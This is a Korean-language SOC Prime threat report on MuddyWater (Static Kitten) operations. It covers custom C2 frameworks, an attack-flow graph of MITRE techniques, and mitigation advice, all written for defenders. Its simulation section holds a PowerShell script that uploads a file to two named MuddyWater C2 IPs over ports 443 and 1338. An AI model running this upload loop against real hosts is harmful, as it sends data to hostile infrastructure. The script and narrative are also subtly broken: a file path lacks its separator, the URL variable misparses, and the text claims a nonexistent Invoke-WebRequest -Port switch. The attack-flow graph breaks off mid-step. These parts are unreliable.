SOC Prime Bias: Critical

06 Apr 2026 16:42 UTC

MuddyWater 노출: 이란 APT 작전의 내부

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon 팔로우
MuddyWater 노출: 이란 APT 작전의 내부
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

연구자들은 여러 맞춤형 C2 프레임워크와 기회를 이용한 다수의 인터넷 노출 결함 및 대용량 자격 증명 스프레이를 결합한 MuddyWater (Static Kitten) 침입 세트를 식별했습니다. 운영자들은 중동, 유럽, 미국 전역의 대상을 침해하기 위해 정찰, 초기 접근, 데이터 도난 도구를 사슬처럼 연결했습니다.

조사

조사관들은 네덜란드에 호스팅된 VPS에서 노출된 인프라를 압수하고, 목적으로 제작된 세 개의 C2 서버의 이진 파일을 추출했습니다: KeyC2, PersianC2, ArenaC2. 그들은 또한 단계 설정 및 실행을 위해 사용된 PowerShell 기반 로더 및 Node.js 페이로드를 포함하는 지원 도구를 회수했습니다. 이 활동은 공공 노출 CVE에 대한 광범위한 스캐닝 후 악용이 특징이며, 블록체인 스마트 계약을 메커니즘으로 사용하여 C2 엔드포인트를 동적으로 해결하거나 업데이트했습니다.

완화

참조된 CVE의 수정을 우선시하고, 공공 노출 서비스의 노출을 강화하고 제한함으로써 공격 표면을 줄이십시오. 포트 1269에서의 알려지지 않은 아웃바운드 UDP 트래픽을 차단하거나 엄격히 제한하고, 사용자 정의 C2 이진 파일과 그 독특한 명령 패턴에 연결된 실행 아티팩트를 모니터링하십시오. 네트워크 장치의 VPN 및 관리자 계정에 최소 권한 원칙을 적용하고, 비정상적인 PowerShell 동작과 낯선 IP 공간으로의 암호화된 아웃바운드 세션에 대한 탐지 범위를 늘리십시오.

반응

지표가 관찰되면 영향을 받은 시스템을 격리하고, 메모리와 디스크 아티팩트를 보존하며, 식별된 C2 도메인/IP를 즉시 차단하십시오. 복구된 로더 및 Node.js 스크립트의 포렌식 평가를 수행하여 실행 및 지속성을 범위적으로 평가하십시오. 모든 악용된 취약점을 패치하고, 스프레이 또는 도난을 통해 노출되었을 수 있는 모든 자격 증명을 로테이션하십시오.

<div class="wp-block-socprime-category-attack-flow attack-flow-class" data-title="Attack Flow" data-attack-flow="graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ccffcc classDef c2 fill:#ffccff %% Step 1 – Active Scanning: Vulnerability Scanning step1["<b>Action</b> – <b>T1595.002 Active Scanning: Vulnerability Scanning</b><br/>Tool: Nuclei<br/>Description: Mass‑scan public services for exploitable CVEs such as FortiOS CVE‑2024‑55591 and Ivanti CVE‑2026‑1281."] class step1 action tool_nuclei["<b>Tool</b> – <b>Name</b>: Nuclei<br/><b>Description</b>: High‑speed vulnerability scanner used for large‑scale internet probing."] class tool_nuclei tool step1 –>|uses| tool_nuclei step1 –>|leads_to| step2 %% Step 2 – Gather Victim Network Information: DNS step2["<b>Action</b> – <b>T1590.002 Gather Victim Network Information: DNS</b><br/>Tools: subfinder, Sudomy, OneForAll<br/>Description: Enumerate subdomains and DNS records for targets such as clearview.ai and jewishagency.org."] class step2 action tool_subfinder["<b>Tool</b> – <b>Name</b>: subfinder<br/><b>Description</b>: Fast passive subdomain discovery tool."] class tool_subfinder tool step2 –>|uses| tool_subfinder step2 –>|leads_to| step3 %% Step 3 – Active Scanning: Wordlist Scanning step3["<b>Action</b> – <b>T1595.003 Active Scanning: Wordlist Scanning</b><br/>Tool: ffuf<br/>Description: Brute‑force web directories with a medium‑size wordlist to discover hidden resources."] class step3 action tool_ffuf["<b>Tool</b> – <b>Name</b>: ffuf<br/><b>Description</b>: Fast web‑fuzzer for directory and file discovery."] class tool_ffuf tool step3 –>|uses| tool_ffuf step3 –>|leads_to| step4 %% Step 4 – Search Open Technical Databases: Scan Databases step4["<b>Action</b> – <b>T1596.005 Search Open Technical Databases: Scan Databases</b><br/>Tool: Shodan CLI<br/>Description: Query Shodan for vulnerable Ivanti devices using service signatures and favicon hashes."] class step4 action tool_shodan["<b>Tool</b> – <b>Name</b>: Shodan CLI<br/><b>Description</b>: Command‑line interface to the Shodan internet‑exposure search engine."] class tool_shodan tool step4 –>|uses| tool_shodan step4 –>|leads_to| step5 %% Step 5 – Brute Force: Password Spraying step5["<b>Action</b> – <b>T1110.003 Brute Force: Password Spraying</b><br/>Tool: Python owa.py script<br/>Description: Spray common passwords against Outlook Web Access and SMTP services of Israeli, Jordanian and UAE organisations."] class step5 action tool_owa["<b>Tool</b> – <b>Name</b>: owa.py<br/><b>Description</b>: Python script that performs password‑spraying attacks against OWA endpoints."] class tool_owa tool step5 –>|uses| tool_owa step5 –>|leads_to| step6 %% Step 6 – Brute Force: Password Guessing step6["<b>Action</b> – <b>T1110.001 Brute Force: Password Guessing</b><br/>Tool: Patator<br/>Description: Attempt SMTP logins with credential lists to obtain valid accounts."] class step6 action tool_patator["<b>Tool</b> – <b>Name</b>: Patator<br/><b>Description</b>: Multi‑protocol brute‑forcing tool supporting SMTP, SSH, HTTP, etc."] class tool_patator tool step6 –>|uses| tool_patator step6 –>|leads_to| step7 %% Step 7 – Exploit Public‑Facing Application step7["<b>Action</b> – <b>T1190 Exploit Public‑Facing Application</b><br/>Technique: Novel SQL injection flaws in BaSalam and a Postgres development platform.<br/>Description: Exploit crafted SQLi payloads to obtain initial foothold on web servers."] class step7 action step7 –>|leads_to| step8 %% Step 8 – Exploitation of Remote Services step8["<b>Action</b> – <b>T1210 Exploitation of Remote Services</b><br/>Tool: Neo‑reGeorg ASPX web‑shell<br/>Description: Upload web‑shell to compromised Exchange server for persistence and remote command execution."] class step8 action malware_neoregeorg["<b>Malware</b> – <b>Name</b>: Neo‑reGeorg ASPX web‑shell<br/><b>Description</b>: ASPX web‑shell providing remote command execution and tunneling capabilities."] class malware_neoregeorg malware step8 –>|uploads| malware_neoregeorg step8 –>|leads_to| step9 %% Step 9 – Boot or Logon Autostart Execution: Registry Run Keys step9["<b>Action</b> – <b>T1547.001 Boot or Logon Autostart Execution: Registry Run Keys</b><br/>Malware: Node.js payload VfZUSQi6oerKau.js<br/>Description: Create HKCU\Software\Microsoft\Windows\CurrentVersion\Run key for persistence."] class step9 action malware_nodejs["<b>Malware</b> – <b>Name</b>: VfZUSQi6oerKau.js<br/><b>Description</b>: Obfuscated Node.js payload that writes a Run‑key for persistence."] class malware_nodejs malware step9 –>|creates| malware_nodejs step9 –>|leads_to| step10 %% Step 10 – Server Software Component: Web Shell step10["<b>Action</b> – <b>T1505.003 Server Software Component: Web Shell</b><br/>Component: Neo‑reGeorg web‑shell (nfud.aspx)<br/>Description: Enables remote command execution on compromised server."] class step10 action malware_nfud["<b>Malware</b> – <b>Name</b>: nfud.aspx<br/><b>Description</b>: ASPX web‑shell variant used for persistent access."] class malware_nfud malware step10 –>|implements| malware_nfud step10 –>|leads_to| step11 %% Step 11 – Create Account: Local Account step11["<b>Action</b> – <b>T1136.001 Create Account: Local Account</b><br/>Result: Privileged admin account "FortiSetup" with super_admin profile.<br/>Description: Modified FortiGate exploit scripts to add a persistent local admin account."] class step11 action step11 –>|leads_to| step12 %% Step 12 – Obfuscated Files or Information step12["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/>Malware: Node.js payloads<br/>Description: Payloads heavily obfuscated and AES‑CBC encrypted before being written to disk."] class step12 action malware_obf["<b>Malware</b> – <b>Name</b>: Encrypted Node.js payloads<br/><b>Description</b>: AES‑CBC encrypted blobs stored on the victim file system."] class malware_obf malware step12 –>|produces| malware_obf step12 –>|leads_to| step13 %% Step 13 – Deobfuscate/Decode Files or Information step13["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Tool: PowerShell loader reset.ps1<br/>Description: Decrypts AES‑CBC encrypted blobs at runtime."] class step13 action tool_psloader["<b>Tool</b> – <b>Name</b>: reset.ps1<br/><b>Description</b>: PowerShell script that decrypts and loads malicious payloads in memory."] class tool_psloader tool step13 –>|uses| tool_psloader step13 –>|leads_to| step14 %% Step 14 – Reflective Code Loading step14["<b>Action</b> – <b>T1620 Reflective Code Loading</b><br/>Technique: PowerShell loader loads decrypted Node.js components reflectively in memory."] class step14 action step14 –>|leads_to| step15 %% Step 15 – Application Layer Protocol: Web Protocols step15["<b>Action</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/>C2: PersianC2<br/>Description: HTTP polling using JSON API endpoints to retrieve commands."] class step15 action c2_persian["<b>C2</b> – <b>Name</b>: PersianC2<br/><b>Description</b>: HTTP‑based command and control using JSON polling."] class c2_persian c2 step15 –>|communicates_via| c2_persian step15 –>|leads_to| step16 %% Step 16 – Non‑Application Layer Protocol step16["<b>Action</b> – <b>T1095 Non‑Application Layer Protocol</b><br/>C2: KeyC2<br/>Description: Custom binary protocol over UDP port 1269 for beaconing and command execution."] class step16 action c2_key["<b>C2</b> – <b>Name</b>: KeyC2<br/><b>Description</b>: UDP‑based covert channel using proprietary binary format."] class c2_key c2 step16 –>|communicates_via| c2_key step16 –>|leads_to| step17 %% Step 17 – Web Service: Dead Drop Resolver step17["<b>Action</b> – <b>T1102.001 Web Service: Dead Drop Resolver</b><br/>Technique: Query Ethereum smart contracts to resolve C2 server IP addresses dynamically."] class step17 action step17 –>|leads_to| step18 %% Step 18 – Web Service: Bidirectional Communication step18["<b>Action</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/>C2: ArenaC2 (FastAPI/uvicorn)<br/>Description: HTTP POST interface encrypting traffic with AES‑256‑CBC."] class step18 action c2_arena["<b>C2</b> – <b>Name</b>: ArenaC2<br/><b>Description</b>: FastAPI server providing encrypted bidirectional C2 channel."] class c2_arena c2 step18 –>|uses| c2_arena step18 –>|leads_to| step19 %% Step 19 – Web Service: One‑Way Communication step19["<b>Action</b> – <b>T1102.003 Web Service: One‑Way Communication</b><br/>Component: Minimal Flask server (web.py) on port 10443 accepting file uploads for exfiltration."] class step19 action malware_flask["<b>Malware</b> – <b>Name</b>: web.py<br/><b>Description</b>: Simple Flask app acting as a dead‑drop for stolen data."] class malware_flask malware step19 –>|implements| malware_flask step19 –>|leads_to| step20 %% Step 20 – Protocol Tunneling step20["<b>Action</b> – <b>T1572 Protocol Tunneling</b><br/>Tool: Neo‑reGeorg acting as SOCKS proxy (resocks, revsocks) to tunnel into internal networks."] class step20 action step20 –>|leads_to| step21 %% Step 21 – Proxy: External Proxy step21["<b>Action</b> – <b>T1090.002 Proxy: External Proxy</b><br/>Listeners: resocks and revsocks creating external SOCKS proxies for lateral movement."] class step21 action step21 –>|leads_to| step22 %% Step 22 – Encrypted Channel: Symmetric Cryptography step22["<b>Action</b> – <b>T1573.001 Encrypted Channel: Symmetric Cryptography</b><br/>Technique: ArenaC2 encrypts all C2 traffic with AES‑256‑CBC using a hard‑coded key."] class step22 action step22 –>|leads_to| step23 %% Step 23 – Dynamic Resolution step23["<b>Action</b> – <b>T1568 Dynamic Resolution</b><br/>Method: Smart‑contract calls (getString) on Ethereum return active C2 IP list (e.g., 185.236.25.119)."] class step23 action step23 –>|leads_to| step24 %% Step 24 – Exfiltration to Cloud Storage step24["<b>Action</b> – <b>T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage</b><br/>Tool: rclone<br/>Destination: Wasabi S3, put.io<br/>Description: Upload stolen files to cloud storage accounts."] class step24 action tool_rclone["<b>Tool</b> – <b>Name</b>: rclone<br/><b>Description</b>: Command‑line program for syncing files to cloud storage services."] class tool_rclone tool step24 –>|uses| tool_rclone step24 –>|leads_to| step25 %% Step 25 – Exfiltration Over C2 Channel step25["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/>Capability: KeyC2 and PersianC2 support file download commands to retrieve data from victims."] class step25 action step25 –>|leads_to| step26 %% Step 26 – Exfiltration Over Alternative Protocol step26["<b>Action</b> – <b>T1048 Exfiltration Over Alternative Protocol</b>

공격 흐름

시뮬레이션 실행

전제 조건: 텔레메트리 & 기본 선행 검사가 통과해야 합니다.

근거: 이 섹션은 탐지 규칙을 유발하도록 설계된 적 기법(TTP)의 정확한 실행을 설명합니다. 명령어와 내러티브는 식별된 TTP를 직접 반영해야 하며, 탐지 로직에 의해 예상되는 정확한 텔레메트리를 생성하는 것을 목표로 합니다.

  • 공격 내러티브 및 명령어:

    1. 정찰 및 데이터 준비: 공격자가 로컬 파일을 열거합니다 (T1005) 및 작은 페이로드를 작업 스테이션에 기록합니다 (secret.txt).
    2. C2 통신 설정: PowerShell을 사용하여 (T1059.001) 공격자는 443 포트에 있는 MuddyWater C2 서버 194.11.246.101 에 HTTPS POST를 작성하고 준비된 데이터를 포함합니다.
    3. 대체 채널 (비표준 포트): 간단한 포트 기반 규칙을 피하기 위해 공격자는 Invoke-WebRequest 를 사용하여 포트 1338을 통해 데이터를 다시 유출합니다 -Port 스위치 (PowerShell 7+).
    4. 선택적 프록시 체인: 요청은 외부 프록시를 통해 라우팅되지만 (T1090.002) 최종 목적지 IP는 MuddyWater 호스트로 남아 있습니다. 이를 통해 방화벽 로그는 악성 dst_ip.
  • 회귀 테스트 스크립트:

    # MuddyWater Exfiltration Simulation – PowerShell
    # ------------------------------------------------
    # Step 1: Create dummy data
    $dataPath = "$env:TEMPsecret.txt"
    "Sensitive data $(Get-Date)" | Out-File -FilePath $dataPath -Encoding UTF8
    
    # Step 2: Define C2 endpoints
    $c2Ips = @('194.11.246.101','18.223.24.218')
    $c2Ports = @(443,1338)
    
    # Step 3: Upload via HTTPS (port 443)
    foreach ($ip in $c2Ips) {
        $uri = "https://$ip/upload"
        Invoke-WebRequest -Uri $uri -Method POST -InFile $dataPath -UseBasicParsing -ErrorAction SilentlyContinue
    }
    
    # Step 4: Upload via custom port 1338 (requires PowerShell 7+)
    foreach ($ip in $c2Ips) {
        $uri = "http://$ip:1338/upload"
        Invoke-WebRequest -Uri $uri -Method POST -InFile $dataPath -UseBasicParsing -ErrorAction SilentlyContinue
    }
    
    # Step 5: Clean up
    Remove-Item -Path $dataPath -Force
  • 정리 명령어:

    # 남아있는 네트워크 연결 제거 (Windows)
    Get-NetTCPConnection -RemoteAddress 194.11.246.101,18.223.24.218 |
        Where-Object { $_.State -eq 'Established' } |
        ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }
    
    # 임시 파일 삭제 (필요시 다시 실행)
    $tempFile = "$env:TEMPsecret.txt"
    if (Test-Path $tempFile) { Remove-Item $tempFile -Force }